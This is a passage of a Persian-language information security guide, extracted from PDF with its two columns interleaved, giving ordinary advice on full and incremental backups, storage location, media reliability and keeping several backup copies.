‫ﺧــﺎﻃﺮ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺎﻇــﺖ ﭼﻨﺪﻻﻳــﻪ ﻭ‬
‫ﺑﻜﺎﺭﮔﻴﺮﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﻬـﺖ ﺍﻳﺠـﺎﺩ‬
‫‪20‬‬ ‫‪Mirror Disks‬‬
‫‪٥٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻻ‬
‫ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬ ‫ﺳﺎﺯﮔﺎﺭﻱ‪ ٢١‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑـﺮ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮ ﺩﺭ ﻣـﻮﺭﺩ ﭼﮕـﻮﻧﮕﻲ ﺗﻬﻴـﻪ ﭘـﺸﺘﻴﺒﺎﻥ‬ ‫ﻋﻬــﺪﻩ ﺩﺍﺭﻧــﺪ )ﻣﺜــﻞ ﺍﻧــﻮﺍﻉ ﻓﺎﻳﻠﻬــﺎﻱ ﺗﻨﻈﻴﻤــﺎﺕ ﻭ ﭘﻴﻜﺮﺑﻨــﺪﻱ(‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﮔﺮﺩﺩ‪ .‬ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺁﻧﻬﺎ ﺑـﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﺑـﺪﻭﻥ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻛﺠﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ؟‬ ‫ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﭘﺎﺳﺦ ﺍﻳﻦ ﺳﺆﺍﻝ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻟﻴﻞ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ‬ ‫ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﭼﻨـﺪ ﺷـﺎﺧﻪ ﺍﺻــﻠﻲ‬
‫ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ‬ ‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻳﻜﺘﺎ ﻭ ﺍﺧﺘﺼﺎﺻﻲ ﺷﻤﺎ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺳﺮﻗﺖ ﻭ ﻳﺎ ﺁﺗﺶﺳﻮﺯﻱ ﺍﺳﺖ ﻣﺤﻞ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻧﺒﺎﻳﺪ ﻧﺰﺩﻳـﻚ‬


‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺟﺎﻳﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﻳـﻦ‬ ‫ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ‪ .‬ﺑـﺎ ﺗﻬﻴـﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ‬ ‫‪.۲‬‬
‫ﻣﺸﻜﻼﺕ ﺍﺯ ﺣﻔﺎﻇﺖ ﻛﺎﻣﻞ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ‪ .‬ﻭﻟـﻲ ﺍﮔـﺮ ﺗﻬﻴـﺔ‬ ‫ﺗﻤﺎﻡ ﺳﻴـﺴﺘﻢ ‪ -‬ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ ﺍﺳـﺘﻔﺎﺩﻩﺍﻱ ﻛـﻪ ﺍﺯ ﺁﻥ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻓﻘﻂ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺎﻙ ﺷﺪﻩ ﻳﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ‬ ‫ﻣﻲﺷﻮﺩ ‪ -‬ﻣـﻲﺗـﻮﺍﻥ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ‬
‫ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ ،‬ﺑﺎﻳـﺪ ﻣﺤـﻞ ﺁﻥ ﻃـﻮﺭﻱ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ﻛـﻪ‬ ‫ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻗـﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ ﺑـﻮﺩ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻳـﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺁﺳﺎﻥ ﺑﺎﺷﺪ‪.‬‬ ‫ﺷﺎﺧﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻩ ﺣﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣﻞ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤـﻞ‬ ‫ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﺩﻭ ﺭﻭﺵ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ‪:‬‬
‫ﺍﻣﻦ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺩﺭ ﻣﺤﻠﻲ ﻧﺰﺩﻳﻚ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺭﺍﻩ‬
‫ﺑﻪ ﻣﺤﺾ ﺗﻜﻤﻴﻞ ﻧﺼﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﺯ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎ ﻭ‬ ‫‪.۱‬‬
‫ﺩﻳﮕﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺟﺪﻳﺪﺗﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪﺷـﺪﻩ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ‬
‫ﻼ ﻫﺮ ﭼﻨـﺪ ﻣـﺎﻩ‬‫ﻣﺸﺨﺼﺎﺕ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ‪ -‬ﻣﺜ ﹰ‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬـﺎﻱ ﺍﻣـﻦﺗـﺮ‬
‫ﻳﻜﺒﺎﺭ ‪ -‬ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﻭ ﻧﺴﺨﻪ ﺗﻬﻴـﻪ ﻣـﻲﻛﻨﻨـﺪ ﻭ‬
‫ﻳﻚ ﻧﺴﺨﻪ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﻭﺭ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ‬ ‫ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨـﺼﻲ ﺧـﻮﺩ ﻃﺒـﻖ ﻳـﻚ ﺯﻣﺎﻧﺒﻨـﺪﻱ ﺑـﺎ‬ ‫‪.۲‬‬
‫ﻣﻲﺩﻫﻨﺪ‪.‬‬ ‫ﺩﻭﺭﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ‬
‫ﻛﺎﺭﺑﺮﺩ‪ ،‬ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺭﻭﺷﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻧﻲ ﻭﺟـﻮﺩ‬
‫ﺍﮔﺮ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﺳﺎﺭﻗﺎﻥ ﻗﺼﺪ ﺳﺮﻗﺖ ﺁﻧﻬﺎ‬
‫ﺩﺍﺭﺩ‪:‬‬
‫ﺭﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﺎ ﺳـﺮﻗﺖ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻫﻤـﺎﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑﺪﺳـﺖ‬ ‫ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺧـﻮﺩ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ‬ ‫•‬
‫ﺁﻭﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ‬ ‫ﻧﻤﺎﻳﻴﺪ )ﻫﺮ ﭼﻨﺪ ﻣﺎﻩ ﻳﻜﺒﺎﺭ( ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺣﺠﻢ ﻭﺳﻴﻌﻲ‬
‫ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪.‬‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺁﻳﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ؟‬ ‫ﭼﻨﺎﻧﭽﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺷﻤﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻣﺘﻨﺎﻭﺑﹰﺎ‬ ‫•‬
‫ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻨﮕـﺎﻡ ﻧﻴـﺎﺯ ﻧﺘﻮﺍﻧﻴـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ‬ ‫ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﻭﻟﻲ ﺩﺭ ﻓﺎﺻﻠﻪﻫـﺎﻱ‬
‫ﺗﻬﻴﻪﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬ ‫ﻛﻮﺗﺎﻩ ﻓﻘﻂ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻧـﻮﻉ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‬
‫ﻧﺴﺨﺔ ﻣﺮﺑﻮﻃﻪ ﺑﺴﻴﺎﺭ ﻛﻬﻨﻪ ﻭ ﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺻﺪﻣﻪ‬ ‫•‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ‪ ٢٢‬ﻣﻲ ﮔﻮﻳﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ‬
‫ﺩﻳﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺑﺮﻭﺯ ﺍﻳـﻦ ﻣـﺸﻜﻞ ﺩﺭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓﻼﭘـﻲ ﻭ‬
‫ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺑــﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﻓﺎﻳﻠﻬــﺎ ﺩﺭ ﺍﻳـﻦ ﻧــﻮﻉ‬
‫ﺭﺳﺎﻧﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻫﻢ ﺑﻪ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺩﺳﺘﮕﺎﻫﻲ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻥ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺍﺭﺍﻱ‬ ‫•‬ ‫ﻛﺎﻣﻞ ﻭ ﻫﻢ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳـﺸﻲ‬
‫ﺍﺷﻜﺎﻝ ﺑـﻮﺩﻩ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺩﺍﺩﺓ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺭ‬ ‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ‬

‫‪21‬‬ ‫‪Compatibility‬‬
‫‪22‬‬ ‫‪Incremental Backup‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٦٠‬‬

‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﻫـﻢ ﻧﺪﺍﺭﻧـﺪ؛ ﺍﻣـﺎ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻳـﺪ ﭼﻨـﺪ ﻧـﺴﺨﻪ ﺍﺯ‬ ‫ﺑﺘﻮﺍﻥ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺩﺭ ﺗﻤﺎﻡ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﭼﻬـﺎﺭ‬ ‫ﺧﻮﺍﻧﺪ‪.‬‬
‫ﻧﺴﺨﺔ ﺁﺧﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪.‬‬ ‫ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺩﭼـﺎﺭ‬ ‫•‬
‫ﭼﺮﺍ ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﮕﻮﻧﻪ ﻋﻤﻞ ﺷﻮﺩ؟ ﭼﺮﺍ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬ ‫ﻧﻘﺺ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻧﻘﺺ ﺭﺳﺎﻧﻪ ﺩﺭ ﺩﻳﺴﻜﻬﺎﻱ ﻓﻼﭘﻲ‬
‫ﻣــﺎﻩ ﻗﺒــﻞ ﺭﺍ ﺩﺭ ﺷــﺮﺍﻳﻄﻲ ﻛــﻪ ﻧــﺴﺨﺔ ﺟﺪﻳــﺪﺗﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‬ ‫ﺍﺷﻜﺎﻝ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺠﻲ ﺑﻮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺗﻨﻬﺎ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟ ﺩﻟﻴـﻞ ﺁﻥ ﺳـﺎﺩﻩ ﺍﺳـﺖ‪ :‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺴﺨﺔ‬ ‫ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﻪ ﺷﺪﻥ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻣـﻲﺷـﺪ‬
‫ﺁﺧﺮﻱ ﻛﻪ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ‪ ،‬ﮔﻢ ﺷﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺑﻪ‬ ‫ﭼﻨﺪﺍﻥ ﺗﻌﺠﺐ ﻛﺴﻲ ﺭﺍ ﺑـﺮ ﻧﻤـﻲﺍﻧﮕﻴﺨـﺖ‪ .‬ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺳﺮﻗﺖ ﺭﻭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮﭼـﻪ ﻧـﺴﺨﻪﻫـﺎﻱ‬ ‫ﻓﺸﺮﺩﻩ ﺑﻌﻨـﻮﺍﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﻣﺎﻧـﺪﮔﺎﺭﺗﺮ ﺷـﻬﺮﺕ‬
‫ﻼ ﺑـﻪ ﺭﻭﺯ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﻭﻟـﻲ ﺑﻮﺩﻧـﺸﺎﻥ ﺑﻬﺘـﺮ ﺍﺯ‬
‫ﻣﺎﻫﻬﺎﻱ ﻗﺒﻠﻲ ﻛﺎﻣ ﹰ‬ ‫ﺩﺍﺷﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻳـﻚ ﻣﻄﺎﻟﻌـﻪ ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﻧـﺸﺎﻥ ﺩﺍﺩ‬
‫ﻧﺒﻮﺩﻧﺸﺎﻥ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﻮﺭﺩ ﻳﻚ ﻣﺜﺎﻝ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻧﻜﺘـﻪ ﺍﺳـﺖ‬ ‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩﺍﻱ ﻛﻪ ﻛﻴﻔﻴﺖ ﭼﻨﺪﺍﻥ ﻣﻄﻠﻮﺑﻲ ﻧﺪﺍﺭﻧـﺪ‬
‫ﻛﻪ ﺍﻳﻤﻨـﻲ ﺳـﻄﺢ ﺑـﺎﻻ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﭼﻨﺪﮔﺎﻧـﻪ ﻭ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌـﺪ ﺍﺯ ﮔﺬﺷـﺖ ﺣـﺪﻭﺩ ﺩﻭ ﺳـﺎﻝ ﺍﺯ ﺯﻣـﺎﻥ‬
‫ﺗﻜﺮﺍﺭﺷﺪﻩ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻧﻮﺷﺘﻪﺷﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺷﻮﻧﺪ‪.‬‬
‫ﺧﻮﺍﻧﺪﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻫﻲ ﻏﻴﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﻧﺴﺨﺔ‬
‫ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺁﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﻛﻨﺘﺮﻝ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺍﮔﺮ ﮔﻮﺍﻫﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺧﺮﻳﺪﺍﺭﻱ ﻛﺮﺩﻩﺍﻳـﺪ ﺍﻳـﻦ ﺍﺟـﺎﺯﻩ ﺭﺍ‬ ‫ﺍﺯ ﺻﺤﺖ ﺭﺳﺎﻧﺔ ﺣﺎﻭﻱ ﻧـﺴﺨﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺳـﺖ‪ .‬ﺩﻗـﺖ ﺩﺍﺷـﺘﻪ‬
‫ﻣﻲﺩﻫﺪ‪ ،‬ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻳـﻚ ﻧـﺴﺨﺔ‬ ‫ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ‬
‫ﺛﺎﻧﻮﻳﻪ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻋﻤﻠﻴـﺎﺕ ﻧـﺼﺐ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬ ‫ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙ ﻛـﺮﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲ ﻛﻨﻴـﺪ )ﻣﺜـﻞ ﺩﻳـﺴﻜﻬﺎﻱ ‪ Zip‬ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﻓﻼﭘﻲ(‪ ،‬ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮ ﻭ ﺗﻤﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‬ ‫ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺕ ﺑـﺴﻴﺎﺭ ﻃـﻮﻻﻧﻲ ﻧﮕـﻪ‬
‫ﻣﻲﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺳﺆﺍﻝ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﺍﺯ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﺍﺳﻨﺎﺩ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‬
